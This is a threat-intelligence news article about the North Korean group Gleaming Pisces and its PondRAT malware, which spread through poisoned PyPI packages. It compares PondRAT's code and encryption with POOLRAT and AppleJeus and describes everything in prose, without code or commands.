Gleaming Pisces, a North Korean threat actor, has been active since 2018, targeting the cryptocurrency industry by using fake trading software to infiltrate systems and deploy malware like PondRAT.
This RAT shares similarities with previous Gleaming Pisces malware, including AppleJeus and POOLRAT, indicating a shared codebase. The recent poisoned Python packages campaign, which delivered PondRAT, is attributed to Gleaming Pisces based on these findings.
The poisoned Python packages real-ids, coloredtxt, beautifultext, and minisound, uploaded to PyPI by Gleaming Pisces, implemented an evasive infection chain. After installation, these packages executed encoded code that eventually ran bash commands to download and execute the Linux RAT PondRAT.
It was part of a larger campaign targeting Linux and macOS systems as the analysis revealed similarities between PondRAT and previously attributed Gleaming Pisces malware, such as POOLRAT, suggesting a consistent modus operandi.
The VIPYR Security analysis reveals striking code similarities between the Linux variant of PondRAT and the kupayupdate_stage2 macOS RAT. Both malware variants exhibit identical function names, notably FConnectProxy and AcceptRequest, and share a similar code execution flow.
Their AcceptRequest functions utilize the same command numerical IDs and employ nearly identical method names, which strongly suggest a shared codebase or a direct derivation between the two malware families, indicating a potential connection between their developers or operators.
The analysis by Unit 42 revealed a shared encryption key between multiple PondRAT variants, including macOS and Linux versions, which was also used in kupayupdate_stage2.
One macOS variant, “os_helper,” was found to be part of the poisoned Python packages campaign and shared the same C2 infrastructure as the Linux variant.
Another macOS variant was linked to the AppleJeus campaign, which solidifies the attribution of these campaigns to Gleaming Pisces, a threat actor group.
Researchers discovered new Linux variants of the POOLRAT malware, previously known as a macOS RAT, which share several key similarities with the macOS version, including identical function structures for loading configurations, similar function names and functionality, and nearly identical command handling mechanisms.
It suggests that the Linux versions are adaptations of the original macOS malware, as the Linux variant uses libcurl for communication and logs errors to /tmp/xweb_log.md, while the macOS version uses different methods.
PondRAT, a Linux malware variant associated with the North Korean Gleaming Pisces APT group, is a simplified version of POOLRAT. While both share similar capabilities, PondRAT offers a more limited command set for file transfers, status checks, execution, and configuration management.
Despite its reduced functionality, PondRAT’s ability to exploit legitimate Python packages presents a significant threat to organizations, as it can easily bypass detection mechanisms and lead to widespread network compromise.